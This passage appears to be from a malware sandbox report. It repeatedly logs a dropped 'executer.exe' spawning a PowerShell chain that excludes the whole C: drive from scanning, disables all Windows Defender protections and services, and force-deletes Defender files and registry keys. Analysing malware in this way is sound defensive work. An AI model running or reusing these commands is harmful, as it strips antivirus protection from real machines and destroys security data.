SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; 